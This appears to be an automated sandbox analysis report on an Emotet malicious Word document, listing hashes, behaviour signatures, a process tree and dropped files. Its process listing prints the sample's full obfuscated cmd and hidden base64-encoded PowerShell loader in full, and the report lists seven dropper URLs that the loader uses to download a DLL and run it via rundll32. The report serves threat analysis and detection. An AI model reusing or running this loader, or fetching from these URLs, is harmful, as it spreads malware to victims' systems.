Analysis

  • max time kernel
    115s
  • max time network
    116s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 08:52

General

  • Target

    emotet_e2_a5bb3ac2e78e042dd5e7f8a6297f4c6290d2249def0472bc9cc8b4e7ee8b44b4_2021-01-13__084944629370._doc.doc

  • Size

    157KB

  • MD5

    a4f359ffaf70d53f7e9caffee0560cb3

  • SHA1

    a417dd75b7122b4dfa68263c64df02b794f5b778

  • SHA256

    a5bb3ac2e78e042dd5e7f8a6297f4c6290d2249def0472bc9cc8b4e7ee8b44b4

  • SHA512

    f1bb3ca69fca34409486f08f6a1d4ed85eff16194ede11ed02a4e57d92a069b9a84ec1475b3a1feb35f55bc4a774af240d1b329744f286fa688b296087220811

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://altrashift.com/wp-includes/I/

exe.dropper

https://ojodetigremezcal.com/wp/i62s/

exe.dropper

https://snowremoval-services.com/wp-content/P3Z/

exe.dropper

http://kitsunecomplements.com/too-much-phppq/n65U/

exe.dropper

https://imperioone.com/content/WOBq/

exe.dropper

http://www.autoeck-baden.at/wp-content/w0Vb/

exe.dropper

https://shop.animewho.com/content/Tj/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_a5bb3ac2e78e042dd5e7f8a6297f4c6290d2249def0472bc9cc8b4e7ee8b44b4_2021-01-13__084944629370._doc.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1824
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABEAEUAIAAgAD0AIABbAFQAWQBQAGUAXQAoACIAewAwAH0AewAzAH0AewA0AH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAFMAJwAsACcAUgBlAEMAdABvAFIAeQAnACwAJwBtAC4AaQBPAC4ARABpACcALAAnAFkAJwAsACcAUwB0AEUAJwApADsAIAAgACQAcQAwADkAIAA9ACAAWwBUAFkAcABFAF0AKAAiAHsANwB9AHsANAB9AHsAMQB9AHsAMwB9AHsANQB9AHsANgB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAGkATgAnACwAJwBtAC4AbgBlACcALAAnAFQATQBBAE4AYQBnAEUAcgAnACwAJwBUACcALAAnAHMAdABFACcALAAnAC4AcwBFACcALAAnAFIAdgBJAEMARQBwAG8AJwAsACcAUwB5ACcAKQA7ACAAJABRAG8AbABzADUAdgB2AD0AJABOADMAXwBLACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABXADMANQBRADsAJABJADMAXwBSAD0AKAAnAFIAJwArACgAJwA2ACcAKwAnADQARAAnACkAKQA7ACAAKAAgAGcAZQBUAC0AdgBBAFIASQBhAGIAbABFACAAKAAiADgAIgArACIAZABlACIAKQAgAC0AdgBBAEwAVQBFAG8ATgBMAFkAKQA6ADoAIgBDAGAAUgBlAGEAYABUAGUARABJAHIAYABFAEMAYABUAE8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBWACcAKwAnAEwAZgAnACkAKwAoACcATABkADUAZAAnACsAJwBiACcAKwAnAGkAMwBWAEwAJwArACcAZgAnACkAKwAoACcAVwAnACsAJwBlADkAdwAnACsAJwBtAGcAJwApACsAJwA0ACcAKwAoACcAVgBMACcAKwAnAGYAJwApACkAIAAtAHIARQBQAGwAYQBjAEUAKAAnAFYAJwArACcATABmACcAKQAsAFsAYwBIAGEAUgBdADkAMgApACkAOwAkAFcAMQA2AFEAPQAoACcATAA3ACcAKwAnADYAVwAnACkAOwAgACAAKAAgACAASQBUAGUATQAgAFYAYQBSAEkAYQBCAGwARQA6AFEAMAA5ACAAIAApAC4AdgBhAEwAVQBlADoAOgAiAHMAYABlAGMAdQBSAGAASQBgAFQAeQBQAFIAbwBUAE8AYABjAG8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbAAnACsAJwBzADEAMgAnACkAKQA7ACQAUwA2ADcATgA9ACgAKAAnAFEANwAnACsAJwAzACcAKQArACcAVgAnACkAOwAkAFcAdwBpAHIAdgA1AGEAIAA9ACAAKAAnAFgANQAnACsAJwA1AEgAJwApADsAJABOADAAMwBZAD0AKAAnAEQAJwArACgAJwAxADEAJwArACcARAAnACkAKQA7ACQARwBjAHoAdgAyADEAZwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AEwAZAA1AGQAYgBpADMAewAwAH0AVwBlACcAKwAoACcAOQB3ACcAKwAnAG0AJwApACsAJwBnADQAewAwACcAKwAnAH0AJwApACAALQBmACAAIABbAEMASABBAFIAXQA5ADIAKQArACQAVwB3AGkAcgB2ADUAYQArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEwAOAA0AE8APQAoACcARwAnACsAKAAnADgANgAnACsAJwBHACcAKQApADsAJABNAHoAMgA1AF8AMwBuAD0AKAAoACcAdwBdAHgAbQBbACcAKwAnAHYAcwA6AC8ALwAnACsAJwBhAGwAJwArACcAdAAnACsAJwByACcAKQArACgAJwBhAHMAJwArACcAaAAnACkAKwAoACcAaQBmACcAKwAnAHQALgAnACkAKwAoACcAYwAnACsAJwBvAG0ALwB3AHAALQAnACsAJwBpACcAKwAnAG4AJwApACsAJwBjACcAKwAoACcAbAAnACsAJwB1AGQAZQAnACkAKwAoACcAcwAnACsAJwAvAEkAJwApACsAKAAnAC8AQAB3AF0AJwArACcAeABtACcAKwAnAFsAdgBzADoAJwArACcALwAvAG8AJwArACcAagBvAGQAJwArACcAZQB0ACcAKwAnAGkAJwApACsAKAAnAGcAcgBlAG0AZQB6AGMAJwArACcAYQBsACcAKwAnAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAvACcAKQArACgAJwBpACcAKwAnADYAMgBzAC8AJwApACsAKAAnAEAAdwAnACsAJwBdAHgAbQBbACcAKwAnAHYAcwA6ACcAKwAnAC8ALwBzACcAKQArACgAJwBuAG8AJwArACcAdwByAGUAJwApACsAKAAnAG0AbwAnACsAJwB2ACcAKQArACgAJwBhAGwALQAnACsAJwBzAGUAcgB2ACcAKwAnAGkAYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKwAnAGUAJwApACsAKAAnAG4AdAAvACcAKwAnAFAAMwBaAC8AQAAnACsAJwB3ACcAKwAnAF0AJwArACcAeAAnACsAJwBtAFsAdgA6AC8AJwApACsAKAAnAC8AJwArACcAawBpAHQAcwB1ACcAKwAnAG4AZQBjAG8AJwApACsAKAAnAG0AJwArACcAcABsACcAKQArACgAJwBlAG0AJwArACcAZQAnACsAJwBuACcAKwAnAHQAcwAuAGMAbwBtAC8AdABvACcAKQArACcAbwAnACsAKAAnAC0AJwArACcAbQB1ACcAKQArACgAJwBjAGgALQBwACcAKwAnAGgAcABwACcAKQArACgAJwBxAC8AJwArACcAbgA2ACcAKQArACcANQAnACsAKAAnAFUALwAnACsAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgBzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBpACcAKQArACgAJwBtACcAKwAnAHAAJwArACcAZQByAGkAbwBvAG4AZQAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvAGMAbwBuACcAKwAnAHQAZQAnACsAJwBuAHQALwBXACcAKwAnAE8AQgAnACkAKwAnAHEAJwArACgAJwAvAEAAJwArACcAdwAnACkAKwAoACcAXQB4ACcAKwAnAG0AWwB2ACcAKwAnADoALwAvAHcAJwArACcAdwB3AC4AYQB1ACcAKwAnAHQAbwBlACcAKwAnAGMAawAtAGIAYQBkACcAKwAnAGUAbgAuAGEAdAAvAHcAcAAtACcAKQArACgAJwBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAnACkAKwAnAC8AdwAnACsAKAAnADAAJwArACcAVgBiACcAKQArACgAJwAvAEAAdwBdAHgAbQBbACcAKwAnAHYAcwAnACkAKwAoACcAOgAvACcAKwAnAC8AcwBoACcAKQArACcAbwBwACcAKwAoACcALgBhAG4AJwArACcAaQBtACcAKQArACcAZQAnACsAKAAnAHcAJwArACcAaABvAC4AYwBvACcAKwAnAG0ALwAnACsAJwBjAG8AJwApACsAKAAnAG4AdAAnACsAJwBlACcAKQArACgAJwBuAHQAJwArACcALwAnACkAKwAoACcAVABqACcAKwAnAC8AJwApACkALgAiAHIARQBwAGwAYABBAGAAYwBlACIAKAAoACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbACcAKwAnAHYAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQB3ACcAKwAnAGYAJwApACkALAAoACcAdwBlACcAKwAoACcAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQApAFsAMgBdACkALgAiAHMAUABsAGAAaQB0ACIAKAAkAFcAOAA1AFIAIAArACAAJABRAG8AbABzADUAdgB2ACAAKwAgACQAQgA0ADYATgApADsAJABMADgAMwBUAD0AKAAnAFAAJwArACgAJwA1ADYAJwArACcAUAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB5ADQAMAB3AGoAZwAgAGkAbgAgACQATQB6ADIANQBfADMAbgApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3ACcAKwAnAC0ATwBiAGoAZQBjAHQAJwApACAAUwB5AFMAVABlAG0ALgBOAEUAVAAuAFcARQBCAEMATABJAEUATgB0ACkALgAiAEQAYABPAHcATgBMAG8AYQBEAGAARgBgAGkATABlACIAKAAkAEYAeQA0ADAAdwBqAGcALAAgACQARwBjAHoAdgAyADEAZwApADsAJABSADUANQBRAD0AKAAnAFkANAAnACsAJwA4AFMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEcAYwB6AHYAMgAxAGcAKQAuACIAbABgAGUATgBgAEcAdABoACIAIAAtAGcAZQAgADMANgAzADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABHAGMAegB2ADIAMQBnACwAKAAoACcAUwAnACsAJwBoAG8AdwBEACcAKQArACgAJwBpAGEAJwArACcAbABvACcAKQArACcAZwAnACsAJwBBACcAKQAuACIAVABPAFMAYABUAFIASQBgAE4ARwAiACgAKQA7ACQAWAAzADMAQgA9ACgAJwBLADYAJwArACcANQBGACcAKQA7AGIAcgBlAGEAawA7ACQATwA2ADUATAA9ACgAKAAnAE0ANwAnACsAJwAzACcAKQArACcATgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMABfAEoAPQAoACcARgAnACsAKAAnADkAJwArACcAMgBRACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1780
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAgACQAOABEAEUAIAAgAD0AIABbAFQAWQBQAGUAXQAoACIAewAwAH0AewAzAH0AewA0AH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAFMAJwAsACcAUgBlAEMAdABvAFIAeQAnACwAJwBtAC4AaQBPAC4ARABpACcALAAnAFkAJwAsACcAUwB0AEUAJwApADsAIAAgACQAcQAwADkAIAA9ACAAWwBUAFkAcABFAF0AKAAiAHsANwB9AHsANAB9AHsAMQB9AHsAMwB9AHsANQB9AHsANgB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAGkATgAnACwAJwBtAC4AbgBlACcALAAnAFQATQBBAE4AYQBnAEUAcgAnACwAJwBUACcALAAnAHMAdABFACcALAAnAC4AcwBFACcALAAnAFIAdgBJAEMARQBwAG8AJwAsACcAUwB5ACcAKQA7ACAAJABRAG8AbABzADUAdgB2AD0AJABOADMAXwBLACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABXADMANQBRADsAJABJADMAXwBSAD0AKAAnAFIAJwArACgAJwA2ACcAKwAnADQARAAnACkAKQA7ACAAKAAgAGcAZQBUAC0AdgBBAFIASQBhAGIAbABFACAAKAAiADgAIgArACIAZABlACIAKQAgAC0AdgBBAEwAVQBFAG8ATgBMAFkAKQA6ADoAIgBDAGAAUgBlAGEAYABUAGUARABJAHIAYABFAEMAYABUAE8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBWACcAKwAnAEwAZgAnACkAKwAoACcATABkADUAZAAnACsAJwBiACcAKwAnAGkAMwBWAEwAJwArACcAZgAnACkAKwAoACcAVwAnACsAJwBlADkAdwAnACsAJwBtAGcAJwApACsAJwA0ACcAKwAoACcAVgBMACcAKwAnAGYAJwApACkAIAAtAHIARQBQAGwAYQBjAEUAKAAnAFYAJwArACcATABmACcAKQAsAFsAYwBIAGEAUgBdADkAMgApACkAOwAkAFcAMQA2AFEAPQAoACcATAA3ACcAKwAnADYAVwAnACkAOwAgACAAKAAgACAASQBUAGUATQAgAFYAYQBSAEkAYQBCAGwARQA6AFEAMAA5ACAAIAApAC4AdgBhAEwAVQBlADoAOgAiAHMAYABlAGMAdQBSAGAASQBgAFQAeQBQAFIAbwBUAE8AYABjAG8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbAAnACsAJwBzADEAMgAnACkAKQA7ACQAUwA2ADcATgA9ACgAKAAnAFEANwAnACsAJwAzACcAKQArACcAVgAnACkAOwAkAFcAdwBpAHIAdgA1AGEAIAA9ACAAKAAnAFgANQAnACsAJwA1AEgAJwApADsAJABOADAAMwBZAD0AKAAnAEQAJwArACgAJwAxADEAJwArACcARAAnACkAKQA7ACQARwBjAHoAdgAyADEAZwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AEwAZAA1AGQAYgBpADMAewAwAH0AVwBlACcAKwAoACcAOQB3ACcAKwAnAG0AJwApACsAJwBnADQAewAwACcAKwAnAH0AJwApACAALQBmACAAIABbAEMASABBAFIAXQA5ADIAKQArACQAVwB3AGkAcgB2ADUAYQArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEwAOAA0AE8APQAoACcARwAnACsAKAAnADgANgAnACsAJwBHACcAKQApADsAJABNAHoAMgA1AF8AMwBuAD0AKAAoACcAdwBdAHgAbQBbACcAKwAnAHYAcwA6AC8ALwAnACsAJwBhAGwAJwArACcAdAAnACsAJwByACcAKQArACgAJwBhAHMAJwArACcAaAAnACkAKwAoACcAaQBmACcAKwAnAHQALgAnACkAKwAoACcAYwAnACsAJwBvAG0ALwB3AHAALQAnACsAJwBpACcAKwAnAG4AJwApACsAJwBjACcAKwAoACcAbAAnACsAJwB1AGQAZQAnACkAKwAoACcAcwAnACsAJwAvAEkAJwApACsAKAAnAC8AQAB3AF0AJwArACcAeABtACcAKwAnAFsAdgBzADoAJwArACcALwAvAG8AJwArACcAagBvAGQAJwArACcAZQB0ACcAKwAnAGkAJwApACsAKAAnAGcAcgBlAG0AZQB6AGMAJwArACcAYQBsACcAKwAnAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAvACcAKQArACgAJwBpACcAKwAnADYAMgBzAC8AJwApACsAKAAnAEAAdwAnACsAJwBdAHgAbQBbACcAKwAnAHYAcwA6ACcAKwAnAC8ALwBzACcAKQArACgAJwBuAG8AJwArACcAdwByAGUAJwApACsAKAAnAG0AbwAnACsAJwB2ACcAKQArACgAJwBhAGwALQAnACsAJwBzAGUAcgB2ACcAKwAnAGkAYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKwAnAGUAJwApACsAKAAnAG4AdAAvACcAKwAnAFAAMwBaAC8AQAAnACsAJwB3ACcAKwAnAF0AJwArACcAeAAnACsAJwBtAFsAdgA6AC8AJwApACsAKAAnAC8AJwArACcAawBpAHQAcwB1ACcAKwAnAG4AZQBjAG8AJwApACsAKAAnAG0AJwArACcAcABsACcAKQArACgAJwBlAG0AJwArACcAZQAnACsAJwBuACcAKwAnAHQAcwAuAGMAbwBtAC8AdABvACcAKQArACcAbwAnACsAKAAnAC0AJwArACcAbQB1ACcAKQArACgAJwBjAGgALQBwACcAKwAnAGgAcABwACcAKQArACgAJwBxAC8AJwArACcAbgA2ACcAKQArACcANQAnACsAKAAnAFUALwAnACsAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgBzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBpACcAKQArACgAJwBtACcAKwAnAHAAJwArACcAZQByAGkAbwBvAG4AZQAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvAGMAbwBuACcAKwAnAHQAZQAnACsAJwBuAHQALwBXACcAKwAnAE8AQgAnACkAKwAnAHEAJwArACgAJwAvAEAAJwArACcAdwAnACkAKwAoACcAXQB4ACcAKwAnAG0AWwB2ACcAKwAnADoALwAvAHcAJwArACcAdwB3AC4AYQB1ACcAKwAnAHQAbwBlACcAKwAnAGMAawAtAGIAYQBkACcAKwAnAGUAbgAuAGEAdAAvAHcAcAAtACcAKQArACgAJwBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAnACkAKwAnAC8AdwAnACsAKAAnADAAJwArACcAVgBiACcAKQArACgAJwAvAEAAdwBdAHgAbQBbACcAKwAnAHYAcwAnACkAKwAoACcAOgAvACcAKwAnAC8AcwBoACcAKQArACcAbwBwACcAKwAoACcALgBhAG4AJwArACcAaQBtACcAKQArACcAZQAnACsAKAAnAHcAJwArACcAaABvAC4AYwBvACcAKwAnAG0ALwAnACsAJwBjAG8AJwApACsAKAAnAG4AdAAnACsAJwBlACcAKQArACgAJwBuAHQAJwArACcALwAnACkAKwAoACcAVABqACcAKwAnAC8AJwApACkALgAiAHIARQBwAGwAYABBAGAAYwBlACIAKAAoACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbACcAKwAnAHYAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQB3ACcAKwAnAGYAJwApACkALAAoACcAdwBlACcAKwAoACcAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQApAFsAMgBdACkALgAiAHMAUABsAGAAaQB0ACIAKAAkAFcAOAA1AFIAIAArACAAJABRAG8AbABzADUAdgB2ACAAKwAgACQAQgA0ADYATgApADsAJABMADgAMwBUAD0AKAAnAFAAJwArACgAJwA1ADYAJwArACcAUAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB5ADQAMAB3AGoAZwAgAGkAbgAgACQATQB6ADIANQBfADMAbgApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3ACcAKwAnAC0ATwBiAGoAZQBjAHQAJwApACAAUwB5AFMAVABlAG0ALgBOAEUAVAAuAFcARQBCAEMATABJAEUATgB0ACkALgAiAEQAYABPAHcATgBMAG8AYQBEAGAARgBgAGkATABlACIAKAAkAEYAeQA0ADAAdwBqAGcALAAgACQARwBjAHoAdgAyADEAZwApADsAJABSADUANQBRAD0AKAAnAFkANAAnACsAJwA4AFMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEcAYwB6AHYAMgAxAGcAKQAuACIAbABgAGUATgBgAEcAdABoACIAIAAtAGcAZQAgADMANgAzADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABHAGMAegB2ADIAMQBnACwAKAAoACcAUwAnACsAJwBoAG8AdwBEACcAKQArACgAJwBpAGEAJwArACcAbABvACcAKQArACcAZwAnACsAJwBBACcAKQAuACIAVABPAFMAYABUAFIASQBgAE4ARwAiACgAKQA7ACQAWAAzADMAQgA9ACgAJwBLADYAJwArACcANQBGACcAKQA7AGIAcgBlAGEAawA7ACQATwA2ADUATAA9ACgAKAAnAE0ANwAnACsAJwAzACcAKQArACcATgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMABfAEoAPQAoACcARgAnACsAKAAnADkAJwArACcAMgBRACcAKQApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Ld5dbi3\We9wmg4\X55H.dll ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1668
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Ld5dbi3\We9wmg4\X55H.dll ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1492
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nmiielow\bnyuygf.igh",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1560

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Ld5dbi3\We9wmg4\X55H.dll
      MD5

      96bbb497964f86796219f92c1c5f448b

      SHA1

      907af9b0253ec3a630bfcf6dfb58c3e8c4ef9312

      SHA256

      325800bbfe93c119dd080943467b6d104be3f2984c65b6e68bebc1f24130a590

      SHA512

      2ef7c3a4d3bd8d1066630eb364a0446b7362bdbe60b67db08572f973771f90815807b3d9fea0e22fba06b253457a329a59b5d39548122a1feeef36f1e662306b

    • \Users\Admin\Ld5dbi3\We9wmg4\X55H.dll
      MD5

      96bbb497964f86796219f92c1c5f448b

      SHA1

      907af9b0253ec3a630bfcf6dfb58c3e8c4ef9312

      SHA256

      325800bbfe93c119dd080943467b6d104be3f2984c65b6e68bebc1f24130a590

      SHA512

      2ef7c3a4d3bd8d1066630eb364a0446b7362bdbe60b67db08572f973771f90815807b3d9fea0e22fba06b253457a329a59b5d39548122a1feeef36f1e662306b

    • \Users\Admin\Ld5dbi3\We9wmg4\X55H.dll
      MD5

      96bbb497964f86796219f92c1c5f448b

      SHA1

      907af9b0253ec3a630bfcf6dfb58c3e8c4ef9312

      SHA256

      325800bbfe93c119dd080943467b6d104be3f2984c65b6e68bebc1f24130a590

      SHA512

      2ef7c3a4d3bd8d1066630eb364a0446b7362bdbe60b67db08572f973771f90815807b3d9fea0e22fba06b253457a329a59b5d39548122a1feeef36f1e662306b

    • \Users\Admin\Ld5dbi3\We9wmg4\X55H.dll
      MD5

      96bbb497964f86796219f92c1c5f448b

      SHA1

      907af9b0253ec3a630bfcf6dfb58c3e8c4ef9312

      SHA256

      325800bbfe93c119dd080943467b6d104be3f2984c65b6e68bebc1f24130a590

      SHA512

      2ef7c3a4d3bd8d1066630eb364a0446b7362bdbe60b67db08572f973771f90815807b3d9fea0e22fba06b253457a329a59b5d39548122a1feeef36f1e662306b

    • \Users\Admin\Ld5dbi3\We9wmg4\X55H.dll
      MD5

      96bbb497964f86796219f92c1c5f448b

      SHA1

      907af9b0253ec3a630bfcf6dfb58c3e8c4ef9312

      SHA256

      325800bbfe93c119dd080943467b6d104be3f2984c65b6e68bebc1f24130a590

      SHA512

      2ef7c3a4d3bd8d1066630eb364a0446b7362bdbe60b67db08572f973771f90815807b3d9fea0e22fba06b253457a329a59b5d39548122a1feeef36f1e662306b

    • memory/936-19-0x000007FEF7FE0000-0x000007FEF825A000-memory.dmp
      Filesize

      2.5MB

    • memory/1324-2-0x0000000000000000-mapping.dmp
    • memory/1440-6-0x000000001ABD0000-0x000000001ABD1000-memory.dmp
      Filesize

      4KB

    • memory/1440-10-0x0000000002880000-0x0000000002881000-memory.dmp
      Filesize

      4KB

    • memory/1440-9-0x000000001B600000-0x000000001B601000-memory.dmp
      Filesize

      4KB

    • memory/1440-8-0x00000000023A0000-0x00000000023A1000-memory.dmp
      Filesize

      4KB

    • memory/1440-7-0x0000000002440000-0x0000000002441000-memory.dmp
      Filesize

      4KB

    • memory/1440-5-0x0000000002360000-0x0000000002361000-memory.dmp
      Filesize

      4KB

    • memory/1440-4-0x000007FEF5C40000-0x000007FEF662C000-memory.dmp
      Filesize

      9.9MB

    • memory/1440-3-0x0000000000000000-mapping.dmp
    • memory/1492-13-0x0000000000000000-mapping.dmp
    • memory/1560-18-0x0000000000000000-mapping.dmp
    • memory/1668-11-0x0000000000000000-mapping.dmp